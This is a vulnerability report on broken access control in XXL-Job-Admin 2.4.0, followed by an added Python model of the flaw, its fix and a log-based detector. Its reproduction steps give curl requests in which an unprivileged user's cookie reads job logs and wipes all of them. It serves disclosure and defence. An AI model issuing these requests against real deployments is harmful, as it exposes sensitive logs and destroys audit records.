Environment
MySQL 5.7.44, XXL-Job-Admin 2.4.0
Virtual Machine 1: Ubuntu 22.04.3 (as XXL-Job-Admin)
Virtual Machine 2: Ubuntu 22.04.3 (as XXL-Job-Executor)
Vulnerability Information
It was found that direct requests to /xxl-job-admin/joblog/clearLog and /xxl-job-admin/joblog/logDetailPage do not validate user privileges, which creates a risk of sensitive information leakage and log loss.
Steps to reproduce the behavior
Step 1: Create a normal user without any privilege inside the web console, as shown below.
Step 2: Retrieve the login cookie for that user.
Step 3: Run the following command to test the log query:
curl -v -X POST "http://<IP address:port>/xxl-job-admin/joblog/logDetailCat" --cookie "XXL_JOB_LOGIN_IDENTITY=<normal user cookie>" -d 'logId=9&fromLineNum=1'
The log query succeeds and returns a 200 status.
Step 4: Run the following command to clear the logs:
curl -v -X POST "http://<IP address:port>/xxl-job-admin/joblog/clearLog" --cookie "XXL_JOB_LOGIN_IDENTITY=<normal user cookie>" -d 'jobGroup=0&jobId=0&type=9'
It returns a 200 status.
Step 5: Check the logs in the console. They show that all logs were cleared successfully by the normal user.
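As an added illustration (not xxl-job's code and not part of the original report), the following Python models the authorization gap described above from a defender's side: a login-only check that lets any session reach the clearLog endpoint, beside a role-aware check that returns 403 for a non-admin session, plus a small detection pass over constructed access-log lines that flags successful clearLog calls by users outside a known-admin set. The Session structure, the policy table, the meaning given to jobGroup=0&jobId=0&type=9 ("clear everything") and the sample log lines are all assumptions made for this example.

```python
import re
from dataclasses import dataclass
from typing import Callable, FrozenSet, List, Optional, Tuple
from urllib.parse import parse_qs


# Constructed session model. The real XXL_JOB_LOGIN_IDENTITY cookie identifies the
# logged-in user; only the admin flag matters here. (Assumption, not xxl-job's structure.)
@dataclass(frozen=True)
class Session:
    username: str
    is_admin: bool


NORMAL_USER = Session("normal_user", is_admin=False)
ADMIN_USER = Session("admin", is_admin=True)

CLEAR_LOG = "/xxl-job-admin/joblog/clearLog"
LOG_DETAIL_CAT = "/xxl-job-admin/joblog/logDetailCat"
LOG_DETAIL_PAGE = "/xxl-job-admin/joblog/logDetailPage"

# Policy assumed for this example: destructive log clearing is admin-only,
# log reads need at least a login.
ADMIN_ONLY = {CLEAR_LOG}
LOGIN_REQUIRED = {LOG_DETAIL_CAT, LOG_DETAIL_PAGE}

Check = Callable[[Optional[Session], str], int]


def authorize_vulnerable(session: Optional[Session], path: str) -> int:
    """Behaviour described in the report: any logged-in session passes, whatever its role."""
    return 200 if session is not None else 302  # 302 = redirect to the login page


def authorize_fixed(session: Optional[Session], path: str) -> int:
    """Role-aware check: admin-only endpoints answer 403 to non-admin sessions."""
    if session is None:
        return 302
    if path in ADMIN_ONLY and not session.is_admin:
        return 403
    return 200


def handle_clear_log(session: Optional[Session], body: str,
                     log_store: List[str], check: Check) -> Tuple[int, int]:
    """Simulate POST /joblog/clearLog against an in-memory list of log records.
    Returns (HTTP status, number of records remaining)."""
    status = check(session, CLEAR_LOG)
    if status != 200:
        return status, len(log_store)
    params = {k: v[0] for k, v in parse_qs(body).items()}
    # Assumed semantics for this toy store: jobGroup=0 and jobId=0 select all groups
    # and all jobs, and type=9 means "clear everything", so the store is emptied.
    if params.get("jobGroup") == "0" and params.get("jobId") == "0" and params.get("type") == "9":
        log_store.clear()
    return 200, len(log_store)


# Combined-log-format access line: ip ident user [time] "METHOD path proto" status size
ACCESS_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]+" (?P<status>\d{3})'
)


def flag_clear_log_success(lines: List[str],
                           admins: FrozenSet[str] = frozenset()) -> List[Tuple[str, str]]:
    """Detection: (client IP, user) pairs that got a 200 from an admin-only endpoint
    while not being in the known-admin set."""
    hits = []
    for line in lines:
        m = ACCESS_LINE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        if (m["method"] == "POST" and m["path"] in ADMIN_ONLY
                and m["status"] == "200" and m["user"] not in admins):
            hits.append((m["ip"], m["user"]))
    return hits


# Constructed sample access log (not real traffic).
SAMPLE_ACCESS_LOG = [
    '10.0.0.5 - normal_user [01/Jan/2024:10:00:01 +0000] "POST /xxl-job-admin/joblog/logDetailCat HTTP/1.1" 200 512',
    '10.0.0.5 - normal_user [01/Jan/2024:10:00:07 +0000] "POST /xxl-job-admin/joblog/clearLog HTTP/1.1" 200 42',
    '10.0.0.9 - admin [01/Jan/2024:10:05:00 +0000] "POST /xxl-job-admin/joblog/clearLog HTTP/1.1" 200 42',
    '10.0.0.5 - normal_user [01/Jan/2024:10:06:00 +0000] "POST /xxl-job-admin/joblog/clearLog HTTP/1.1" 403 0',
]

if __name__ == "__main__":
    body = "jobGroup=0&jobId=0&type=9"
    print("vulnerable check:", handle_clear_log(NORMAL_USER, body, ["log 1", "log 2", "log 3"], authorize_vulnerable))
    print("fixed check:     ", handle_clear_log(NORMAL_USER, body, ["log 1", "log 2", "log 3"], authorize_fixed))
    print("flagged:", flag_clear_log_success(SAMPLE_ACCESS_LOG, admins=frozenset({"admin"})))
```

Under the vulnerable check the normal user's request empties the store with a 200, which is the outcome of Step 4 and Step 5 above; under the fixed check the same request is refused with 403 and the store is untouched. The detection pass only works if the access log records the authenticated user, so a deployment that wants to spot this after the fact needs its reverse proxy or application log to carry that field.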